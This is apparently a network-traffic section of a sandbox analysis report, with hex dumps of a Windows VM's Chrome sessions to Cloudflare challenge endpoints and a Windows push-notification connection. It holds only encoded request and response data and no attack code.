                                                          Data Ascii: eTsZWtlLuXoJjBwrnmw9zdybnJ2ei9pd2xwM2v4MvBxPXI1Obd0v7o2brz/L/Z+9LY4N0JxODn+OMK/ejx69XxB+8dENT9/vUdABjgBBMTHx8M4QEb7uXnEwYj6+wHEvMbCDsrPww1PiAVGjUGIQAgSDRI/iMqME8pE1MSEU8WMBgaVjMtWFo1Tk01NmcjMSNUZR49WSguSGFGcl9HSGgwcE57OHZ5QDh/TINNclpiYX1dZnuNXoBKYlBKaWqRj
                                                          2024-01-24 14:34:09 UTC1369INData Raw: 66 32 72 36 36 6d 36 44 58 7a 73 58 58 35 72 79 36 74 64 2f 50 71 4d 33 4d 32 75 6a 42 35 39 4b 77 34 2f 58 6a 31 66 4c 76 7a 38 69 37 39 39 4c 7a 30 65 50 76 30 50 62 70 32 75 58 6b 42 4e 37 6f 79 77 6e 6a 43 4e 4d 50 34 2f 50 74 42 76 76 70 45 42 51 49 49 42 41 67 42 50 45 51 47 51 50 67 49 43 6b 4d 2b 41 49 6a 47 43 54 6e 4b 67 4d 4f 44 52 34 4a 41 66 63 73 47 44 41 37 48 67 30 4b 43 54 67 52 48 68 6c 45 46 78 49 64 51 52 30 6d 4c 6b 73 68 54 79 34 64 4d 6b 67 75 54 54 38 6d 47 46 42 46 4b 6a 5a 54 51 44 30 32 57 6b 31 43 50 6b 46 49 49 53 56 6c 50 56 77 35 59 44 31 67 58 31 39 43 5a 31 56 6b 52 33 68 6e 61 6b 74 39 52 6e 68 52 57 6e 52 66 5a 46 49 39 63 6d 5a 6d 59 6f 42 66 67 45 31 72 59 59 56 64 69 57 53 4a 58 6f 46 2f 5a 32 36 47 67 33 71 49 6c 48
                                                          Data Ascii: f2r66m6DXzsXX5ry6td/PqM3M2ujB59Kw4/Xj1fLvz8i799Lz0ePv0Pbp2uXkBN7oywnjCNMP4/PtBvvpEBQIIBAgBPEQGQPgICkM+AIjGCTnKgMODR4JAfcsGDA7Hg0KCTgRHhlEFxIdQR0mLkshTy4dMkguTT8mGFBFKjZTQD02Wk1CPkFIISVlPVw5YD1gX19CZ1VkR3hnakt9RnhRWnRfZFI9cmZmYoBfgE1rYYVdiWSJXoF/Z26Gg3qIlH
                                                          2024-01-24 14:34:09 UTC1369INData Raw: 74 74 66 41 31 62 72 46 75 4f 47 2b 37 38 6a 63 77 4d 79 7a 35 73 62 6d 37 75 6e 4b 36 39 7a 75 7a 76 36 37 37 4e 45 45 7a 50 48 56 42 38 66 34 32 2f 76 67 2b 4e 37 70 32 41 4c 69 33 4d 76 39 35 76 44 58 44 75 6f 63 35 41 37 75 45 50 51 4e 38 2b 77 62 46 76 55 59 43 52 62 36 47 78 38 61 2f 51 6e 76 49 51 45 4f 42 52 63 49 4b 42 45 6e 43 68 58 33 4d 41 39 41 46 53 34 53 4e 43 55 79 46 30 67 5a 50 42 77 56 44 44 73 66 54 77 78 47 49 69 34 6c 52 43 55 78 46 45 49 72 4a 69 6c 4d 4d 46 41 70 54 54 45 2b 4e 56 51 33 56 79 42 56 4f 7a 5a 4e 56 6a 31 67 52 56 4e 42 54 54 52 65 52 6e 63 34 62 6b 6c 56 4e 47 5a 50 57 6c 56 6a 55 6c 31 45 64 56 68 34 56 58 74 63 56 6d 56 32 59 46 70 70 68 47 4e 74 69 34 70 6e 63 56 43 4c 61 70 78 74 6a 6e 42 71 63 5a 42 7a 70 49 57
                                                          Data Ascii: ttfA1brFuOG+78jcwMyz5sbm7unK69zuzv677NEEzPHVB8f42/vg+N7p2ALi3Mv95vDXDuoc5A7uEPQN8+wbFvUYCRb6Gx8a/QnvIQEOBRcIKBEnChX3MA9AFS4SNCUyF0gZPBwVDDsfTwxGIi4lRCUxFEIrJilMMFApTTE+NVQ3VyBVOzZNVj1gRVNBTTReRnc4bklVNGZPWlVjUl1EdVh4VXtcVmV2YFpphGNti4pncVCLapxtjnBqcZBzpIW
                                                          2024-01-24 14:34:09 UTC1369INData Raw: 75 48 49 33 73 33 49 77 2b 57 7a 30 75 48 42 37 39 48 4c 37 66 62 30 7a 2f 4c 49 33 74 33 64 35 64 72 54 34 38 50 39 35 66 72 70 36 4e 38 44 35 4f 37 39 33 51 7a 6f 35 77 72 34 45 66 66 35 38 4e 76 75 45 66 7a 2b 44 75 30 63 41 66 63 63 2f 4f 66 36 48 51 6b 6c 41 43 51 46 37 77 4d 50 45 52 4d 69 41 6a 41 51 44 44 41 52 2b 77 38 62 48 54 6b 55 4f 42 6b 45 47 42 4d 6c 4a 7a 59 57 52 43 4d 67 52 43 55 51 4a 42 38 78 54 53 68 4d 4c 52 67 72 58 54 6b 37 53 69 70 59 4f 6a 52 59 4f 53 51 33 61 55 56 68 50 47 42 42 4c 44 35 68 54 55 39 65 50 6d 78 4e 53 47 78 4e 4f 45 70 74 57 58 56 51 64 46 56 41 55 6c 39 68 59 33 4a 53 67 46 78 63 67 47 46 4d 58 6d 74 74 69 57 53 49 61 56 52 6e 59 33 56 33 68 6d 61 55 62 33 43 55 64 57 42 7a 62 34 47 64 65 4a 78 39 61 48 71 74
                                                          Data Ascii: uHI3s3Iw+Wz0uHB79HL7fb0z/LI3t3d5drT48P95frp6N8D5O793Qzo5wr4Eff58NvuEfz+Du0cAfcc/Of6HQklACQF7wMPERMiAjAQDDAR+w8bHTkUOBkEGBMlJzYWRCMgRCUQJB8xTShMLRgrXTk7SipYOjRYOSQ3aUVhPGBBLD5hTU9ePmxNSGxNOEptWXVQdFVAUl9hY3JSgFxcgGFMXmttiWSIaVRnY3V3hmaUb3CUdWBzb4GdeJx9aHqt
                                                          2024-01-24 14:34:09 UTC1369INData Raw: 47 74 30 4e 62 76 71 73 6a 73 38 72 6e 34 38 76 61 2b 39 76 76 57 30 76 4d 42 37 39 34 4c 41 74 30 42 2f 51 51 4a 32 4e 6f 47 7a 68 41 48 34 65 4c 71 30 66 48 79 38 4f 67 62 47 2f 6e 73 46 66 72 37 45 50 55 54 49 53 76 6e 48 4f 76 38 2b 43 34 4e 4d 51 49 6b 4b 79 6f 4e 4a 41 51 6c 4d 75 33 7a 4b 2f 37 31 4f 7a 4d 53 48 54 63 6b 50 55 68 43 52 30 6f 4d 47 45 51 4f 50 42 78 4a 45 51 6f 6b 51 68 4d 4b 4e 45 34 77 57 43 68 4a 56 68 59 74 54 79 4e 69 52 55 34 33 51 30 46 57 50 6d 77 35 4a 54 35 49 52 56 46 42 50 6b 6c 78 54 45 4e 52 5a 55 6c 47 55 58 56 4d 64 30 78 6a 56 48 68 79 50 57 39 6a 58 48 64 4c 51 6e 70 49 54 30 5a 2b 54 49 32 55 62 6d 2b 41 59 33 53 62 65 56 57 49 58 48 61 5a 59 58 32 55 67 49 35 39 63 35 69 44 5a 61 4e 6f 6d 49 42 75 71 6f 64 38 72
                                                          Data Ascii: Gt0Nbvqsjs8rn48va+9vvW0vMB794LAt0B/QQJ2NoGzhAH4eLq0fHy8OgbG/nsFfr7EPUTISvnHOv8+C4NMQIkKyoNJAQlMu3zK/71OzMSHTckPUhCR0oMGEQOPBxJEQokQhMKNE4wWChJVhYtTyNiRU43Q0FWPmw5JT5IRVFBPklxTENRZUlGUXVMd0xjVHhyPW9jXHdLQnpIT0Z+TI2Ubm+AY3SbeVWIXHaZYX2UgI59c5iDZaNomIBuqod8r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          24192.168.2.649747104.17.3.1844432104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:34:09 UTC486OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/655695331:1706105503:NvTe9F65H4Ha20SvtcR2YZxrWN67aApM_5bJtlGEiLs/84a8fe9b2b47507e/2f47f656679f8e4 HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-01-24 14:34:09 UTC386INHTTP/1.1 400 Bad Request
                                                          Date: Wed, 24 Jan 2024 14:34:09 GMT
                                                          Content-Type: application/json
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                          cf-chl-out: EvUBXDuK257AFcB7dGhNcQ==$9qRHqn/Li5vgmS3amZP9Gg==
                                                          Server: cloudflare
                                                          CF-RAY: 84a8fee1fa1f138d-ATL
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-01-24 14:34:09 UTC12INData Raw: 37 0d 0a 69 6e 76 61 6c 69 64 0d 0a
                                                          Data Ascii: 7invalid
                                                          2024-01-24 14:34:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          25192.168.2.64974820.25.241.18443
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:34:15 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 4f 4c 62 65 49 4a 74 2b 5a 6b 71 2f 55 71 53 30 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 61 66 37 32 35 65 33 32 39 66 31 32 32 31 33 0d 0a 0d 0a
                                                          Data Ascii: CNT 1 CON 305MS-CV: OLbeIJt+Zkq/UqS0.1Context: eaf725e329f12213
                                                          2024-01-24 14:34:15 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                          2024-01-24 14:34:15 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 4f 4c 62 65 49 4a 74 2b 5a 6b 71 2f 55 71 53 30 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 61 66 37 32 35 65 33 32 39 66 31 32 32 31 33 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 77 2b 31 66 33 69 61 34 31 7a 5a 2b 77 76 46 41 79 4c 6a 79 4a 4f 35 78 62 41 42 68 6e 53 35 76 63 2f 63 50 34 66 65 41 6f 6c 56 30 51 4e 33 4a 6d 36 57 4e 72 67 4f 55 68 2f 76 6b 32 6c 34 42 67 2b 31 68 66 65 76 67 39 4b 67 31 59 53 55 5a 62 30 41 48 4c 79 53 39 58 33 6e 71 77 37 45 55 67 38 4e 78 67 62 61 6f 56 6a 6d 77
                                                          Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: OLbeIJt+Zkq/UqS0.2Context: eaf725e329f12213<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARw+1f3ia41zZ+wvFAyLjyJO5xbABhnS5vc/cP4feAolV0QN3Jm6WNrgOUh/vk2l4Bg+1hfevg9Kg1YSUZb0AHLyS9X3nqw7EUg8NxgbaoVjmw
                                                          2024-01-24 14:34:15 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 4f 4c 62 65 49 4a 74 2b 5a 6b 71 2f 55 71 53 30 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 61 66 37 32 35 65 33 32 39 66 31 32 32 31 33 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                          Data Ascii: BND 3 CON\WNS 0 197MS-CV: OLbeIJt+Zkq/UqS0.3Context: eaf725e329f12213<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                          2024-01-24 14:34:15 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                          Data Ascii: 202 1 CON 58
                                                          2024-01-24 14:34:15 UTC58INData Raw: 4d 53 2d 43 56 3a 20 45 64 57 6f 4f 71 44 5a 4c 45 65 58 6b 77 4f 70 72 2b 77 57 57 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                          Data Ascii: MS-CV: EdWoOqDZLEeXkwOpr+wWWA.0Payload parsing failed.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          26192.168.2.649749104.17.2.1844432104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:34:23 UTC916OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/655695331:1706105503:NvTe9F65H4Ha20SvtcR2YZxrWN67aApM_5bJtlGEiLs/84a8fe9b2b47507e/2f47f656679f8e4 HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          Content-Length: 29159
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          Content-type: application/x-www-form-urlencoded
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          CF-Challenge: 2f47f656679f8e4
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Origin: https://challenges.cloudflare.com
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/nbltc/0x4AAAAAAAQcAKAiG1Sgzcix/auto/normal
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-01-24 14:34:23 UTC16384OUTData Raw: 76 5f 38 34 61 38 66 65 39 62 32 62 34 37 35 30 37 65 3d 61 6f 59 4f 56 38 4e 24 39 6e 59 4d 50 73 65 4c 67 4e 67 46 59 4c 41 4e 41 6e 42 25 32 62 42 6a 4f 73 6f 42 4b 42 35 4f 73 59 38 4b 62 42 58 38 42 4c 34 56 6f 4e 48 47 42 43 4f 6c 6f 42 64 49 42 76 4f 46 63 59 6c 59 42 61 59 37 42 37 4f 73 66 72 65 73 64 59 4e 4b 38 42 67 50 4e 74 42 43 50 4e 78 46 42 42 6f 42 79 4e 5a 50 42 71 34 71 34 4e 78 78 4b 42 6c 63 6c 36 67 42 73 71 4b 42 6b 48 48 4f 77 65 42 61 39 4f 42 61 58 44 53 46 42 79 4f 42 78 37 76 63 41 35 58 4b 73 6c 43 35 6f 34 62 6e 45 73 34 42 62 68 43 63 46 4f 6d 6a 38 62 42 4c 6c 45 43 4e 77 69 4f 42 35 37 4f 42 67 42 59 63 46 68 4d 65 42 57 4f 4e 33 52 66 56 57 49 50 74 63 67 69 65 42 33 5a 53 32 68 46 72 52 54 34 72 63 30 6d 4b 31 45 66 72
                                                          Data Ascii: v_84a8fe9b2b47507e=aoYOV8N$9nYMPseLgNgFYLANAnB%2bBjOsoBKB5OsY8KbBX8BL4VoNHGBCOloBdIBvOFcYlYBaY7B7OsfresdYNK8BgPNtBCPNxFBBoByNZPBq4q4NxxKBlcl6gBsqKBkHHOweBa9OBaXDSFByOBx7vcA5XKslC5o4bnEs4BbhCcFOmj8bBLlECNwiOB57OBgBYcFhMeBWON3RfVWIPtcgieB3ZS2hFrRT4rc0mK1Efr
                                                          2024-01-24 14:34:23 UTC12775OUTData Raw: 43 71 70 4b 4e 70 34 78 41 77 39 61 6d 75 58 75 78 4f 69 42 59 42 77 42 64 4f 4e 65 4e 64 42 50 4f 42 72 4e 63 34 2b 30 38 37 4e 56 39 38 4f 73 64 4e 57 42 67 4f 6e 61 51 78 42 2b 4f 4c 24 42 34 42 42 34 6c 78 4f 74 42 46 34 73 42 38 6e 42 63 34 43 66 42 79 42 64 42 42 72 4e 52 37 59 37 4e 64 42 65 42 24 37 38 4f 4e 70 42 73 42 6e 4b 37 58 42 62 34 73 39 45 70 34 46 48 76 6f 42 33 6f 66 4f 42 67 42 79 4f 38 76 72 57 4e 41 4f 42 57 43 69 4e 52 37 73 39 4c 49 45 50 39 35 39 6e 72 42 66 42 42 57 43 50 38 34 42 4c 34 42 72 42 47 42 62 37 73 5a 42 62 4f 69 34 6c 24 4e 6c 42 6b 4f 6b 50 38 30 42 6f 34 4e 34 4e 67 42 6a 4f 61 6f 4c 31 42 37 34 67 73 4c 7a 42 45 58 6c 50 4c 78 42 4a 4f 6b 65 38 47 42 76 4f 67 73 42 6e 42 39 34 6b 73 38 74 42 37 6c 6e 66 38 51 42
                                                          Data Ascii: CqpKNp4xAw9amuXuxOiBYBwBdONeNdBPOBrNc4+087NV98OsdNWBgOnaQxB+OL$B4BB4lxOtBF4sB8nBc4CfByBdBBrNR7Y7NdBeB$78ONpBsBnK7XBb4s9Ep4FHvoB3ofOBgByO8vrWNAOBWCiNR7s9LIEP959nrBfBBWCP84BL4BrBGBb7sZBbOi4l$NlBkOkP80Bo4N4NgBjOaoL1B74gsLzBEXlPLxBJOke8GBvOgsBnB94ks8tB7lnf8QB
                                                          2024-01-24 14:34:23 UTC1199INHTTP/1.1 200 OK
                                                          Date: Wed, 24 Jan 2024 14:34:23 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          cf-chl-out: f4/ZRRkXmccCRlM+p2FRIW9GyIai+JhHjsXKXDQvYtdycLVl/XI1QPDkTIRhPzpUXFBM+0/4KUeQP0eVdhwwBSxePTL1uisxHUPgx0N3cDZ3FiK7dODhskibTcUdNn06$Zdiz8CSNj7gUhpUtkZGOkA==
                                                          cf-chl-out-s: BA9qYnH5PYj2TPXwZX00yHVM4ksUQoh5F4kHztGExrQEPM9NBvSYqzSzcDMdWp9tnlOcXcx0mUMEx2hdTgRdfPNcuWUS/iGIjqDgC7v6vZaCUn5Wt0xo52KQxbPFlNyVAxbNz5kMtjhQ1FhOTedpkLftRxJ+DUx46whAdlGIEZg8Ynm30ikOiUNxThmhzxS0JGE4x1YDOwc2HjwLNaHj6D2Ogi5J3SfRKhB0d3P3wgAAwKiIqU6/OD9VjI6dUQJY5n7oRJwmbWr+D2O/84hhWed9pHDFsHJnHtQaB9XzNtnoB9fhbfGgJ3ESZVBtNeupW5fiUwmFV6hNj/V+I8oU5xYj5+jzooaXDZ/38KFEYBr2c2IP1hQiJq4+r3elNd5b6moi3gIwnBQfFHlowr0pd84kUcgAtKNw9++IsntTL18ctRhsgvBKD/dUNrYcJJZg3aRuXfzB5Mn3s6VYnmNGoXZfAlmQ69NbluA0Qh7ojFiLdqVcwKHkBVjFXIPWnH8NzjsMqcebAJWwDkjYh6H1WJWEmbGr5gy3nSHaBW7foidrDnOScarlzMUvdOt9EkY4uXwloilZuQNC/Jljcjpx3MSZLlYRMsKWRaby8EEgOf8JGXqU0X9CUhGEAwR9QhDCFD801STGwt+brLKn28do7nO1mV7vmsgX+kEiBGCVjsmvreOBK6VBfH7qguGzkynBGFKRX/rjXbJ4jnzzwtcuysptsoNcux8bzxrsy/wEHzNB502Me/1wjUX4gvczUu4g$GnLluTriqcN+52Bc4oWOsw==
                                                          Server: cloudflare
                                                          CF-RAY: 84a8ff394d956741-ATL
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-01-24 14:34:23 UTC170INData Raw: 64 62 63 0d 0a 66 4c 69 38 75 35 39 37 66 61 2b 77 70 36 4c 43 74 59 54 4b 77 34 71 5a 68 34 79 46 72 36 58 46 72 4b 47 51 75 71 37 55 73 64 6d 64 6e 38 36 7a 6d 37 72 57 75 70 2b 39 6f 74 6e 56 6e 71 6a 72 75 4f 36 76 72 4d 66 31 77 4c 44 4c 2b 4f 2f 75 75 2f 7a 6e 37 73 37 35 32 41 54 57 41 2b 2f 61 31 65 41 41 42 74 73 42 35 78 44 4f 41 64 44 68 33 68 54 55 44 75 6f 4a 32 42 62 71 43 78 41 62 47 74 49 4d 49 4f 77 6a 4a 42 50 34 4b 53 51 6d 2f 51 41 46 4a 51 4d 76 48 41 51 45 4e 53 41 69 43 51 51 4f 4e
                                                          Data Ascii: dbcfLi8u597fa+wp6LCtYTKw4qZh4yFr6XFrKGQuq7Usdmdn86zm7rWup+9otnVnqjruO6vrMf1wLDL+O/uu/zn7s752ATWA+/a1eAABtsB5xDOAdDh3hTUDuoJ2BbqCxAbGtIMIOwjJBP4KSQm/QAFJQMvHAQENSAiCQQON
                                                          2024-01-24 14:34:23 UTC1369INData Raw: 6a 62 75 47 6a 77 4a 50 2f 67 30 46 78 34 45 2b 42 6f 6a 4a 6b 59 64 54 41 55 37 53 67 4e 4d 55 42 31 54 45 55 63 70 57 53 35 48 4a 54 63 56 55 44 42 69 4c 6d 41 33 50 30 63 2f 49 7a 35 71 59 43 70 73 4a 43 6b 69 53 6d 42 72 51 45 39 4e 4b 57 45 32 54 6d 5a 6c 64 32 74 53 66 31 42 64 67 55 35 38 68 6c 64 61 65 56 52 6a 66 56 6c 65 59 48 42 4f 67 6f 42 47 52 35 42 6a 5a 70 43 57 68 47 69 56 66 31 78 62 62 6d 74 33 5a 47 4a 6d 6c 48 32 71 6e 59 75 55 6f 48 75 67 68 36 46 79 6a 58 32 44 6e 34 69 55 67 5a 53 6b 72 36 75 72 65 49 69 67 72 71 4b 30 70 72 4b 68 77 4b 4b 30 70 37 58 49 77 5a 65 6e 6f 71 57 62 79 38 6e 4d 74 71 75 5a 6a 4a 58 5a 73 35 53 32 33 72 54 4b 32 35 76 54 76 39 76 6f 78 72 54 62 33 4d 69 32 36 61 76 6e 76 65 66 47 36 4f 44 30 73 72 66 6d
                                                          Data Ascii: jbuGjwJP/g0Fx4E+BojJkYdTAU7SgNMUB1TEUcpWS5HJTcVUDBiLmA3P0c/Iz5qYCpsJCkiSmBrQE9NKWE2TmZld2tSf1BdgU58hldaeVRjfVleYHBOgoBGR5BjZpCWhGiVf1xbbmt3ZGJmlH2qnYuUoHugh6FyjX2Dn4iUgZSkr6ureIigrqK0prKhwKK0p7XIwZenoqWby8nMtquZjJXZs5S23rTK25vTv9voxrTb3Mi26avnvefG6OD0srfm
                                                          2024-01-24 14:34:23 UTC1369INData Raw: 6b 50 4c 69 4d 65 47 53 63 6f 45 30 67 71 47 6a 6b 34 4d 46 49 4b 50 6a 31 55 49 7a 59 7a 57 43 64 63 4a 78 56 59 4d 54 39 54 4e 32 51 76 51 6a 6f 2b 4d 32 70 4c 51 68 34 36 61 56 41 37 59 6d 46 69 54 6c 49 2f 64 6d 4a 72 65 44 68 6c 62 6e 31 73 61 48 55 2b 65 46 78 52 68 59 4e 6a 57 46 6c 47 57 46 5a 57 61 56 74 73 53 57 52 66 62 6d 35 77 62 33 4a 69 64 6d 5a 32 64 6c 39 73 6f 6c 31 35 62 36 4e 6d 63 33 4b 58 61 58 79 46 64 6e 36 4a 65 36 4e 36 69 49 79 7a 62 5a 4f 43 70 37 43 4e 6c 49 56 35 63 59 71 76 67 5a 71 4f 6e 6f 2b 54 6c 4c 65 43 6c 70 61 37 78 49 47 6f 6e 61 71 73 6f 4a 33 4d 73 62 47 68 6b 62 43 6f 71 4a 61 6e 72 4b 32 71 6d 61 53 35 75 74 69 77 32 72 58 73 70 75 32 74 76 72 71 2f 38 4c 33 4d 39 63 4f 33 77 2b 2f 51 79 62 66 7a 2b 50 33 54 7a
                                                          Data Ascii: kPLiMeGScoE0gqGjk4MFIKPj1UIzYzWCdcJxVYMT9TN2QvQjo+M2pLQh46aVA7YmFiTlI/dmJreDhlbn1saHU+eFxRhYNjWFlGWFZWaVtsSWRfbm5wb3JidmZ2dl9sol15b6Nmc3KXaXyFdn6Je6N6iIyzbZOCp7CNlIV5cYqvgZqOno+TlLeClpa7xIGonaqsoJ3MsbGhkbCoqJanrK2qmaS5utiw2rXspu2tvrq/8L3M9cO3w+/Qybfz+P3Tz
                                                          2024-01-24 14:34:23 UTC615INData Raw: 36 43 53 41 69 4a 68 63 61 4f 6c 4a 41 45 54 42 44 46 41 38 31 53 6b 6b 53 4e 6a 6c 52 54 44 73 2b 50 7a 78 43 57 47 46 65 50 6a 59 37 57 6a 64 65 59 54 70 4a 50 31 31 4b 58 69 31 68 61 47 4a 55 56 6a 6c 47 57 44 5a 58 56 6c 35 66 59 32 4a 64 51 6d 4e 56 56 33 31 39 5a 6d 74 61 59 47 74 74 69 57 78 2b 63 35 52 78 65 48 56 61 64 33 4e 71 6a 59 31 37 6b 36 46 72 67 70 69 59 66 6e 4b 42 6e 5a 53 44 65 35 6c 6d 6d 6f 31 2f 6d 35 4b 6e 6a 37 61 5a 67 62 47 6d 70 6f 74 2b 6e 35 31 35 76 62 53 62 6f 6e 37 45 6c 4b 61 31 6f 70 69 73 6f 71 61 75 7a 38 6d 2f 72 49 2b 71 72 4c 54 58 6d 62 4b 78 7a 35 53 61 76 70 6e 55 75 62 71 7a 73 37 6a 45 75 4c 66 72 78 37 6a 6c 36 38 65 2b 73 75 76 64 36 65 47 2f 30 38 65 32 7a 2b 62 71 37 4e 66 4d 79 74 4c 59 32 39 33 34 33 4e
                                                          Data Ascii: 6CSAiJhcaOlJAETBDFA81SkkSNjlRTDs+PzxCWGFePjY7WjdeYTpJP11KXi1haGJUVjlGWDZXVl5fY2JdQmNVV319ZmtaYGttiWx+c5RxeHVad3NqjY17k6FrgpiYfnKBnZSDe5lmmo1/m5Knj7aZgbGmpot+n515vbSbon7ElKa1opisoqauz8m/rI+qrLTXmbKxz5SavpnUubqzs7jEuLfrx7jl68e+suvd6eG/08e2z+bq7NfMytLY29343N
                                                          2024-01-24 14:34:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          27192.168.2.649751104.17.3.1844432104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:34:24 UTC486OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/655695331:1706105503:NvTe9F65H4Ha20SvtcR2YZxrWN67aApM_5bJtlGEiLs/84a8fe9b2b47507e/2f47f656679f8e4 HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-01-24 14:34:24 UTC386INHTTP/1.1 400 Bad Request
                                                          Date: Wed, 24 Jan 2024 14:34:24 GMT
                                                          Content-Type: application/json
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                          cf-chl-out: 6gEAL0MeQjSLSqAHBNW2Yg==$+b1OeUH/HKCTF8rgy/FGwQ==
                                                          Server: cloudflare
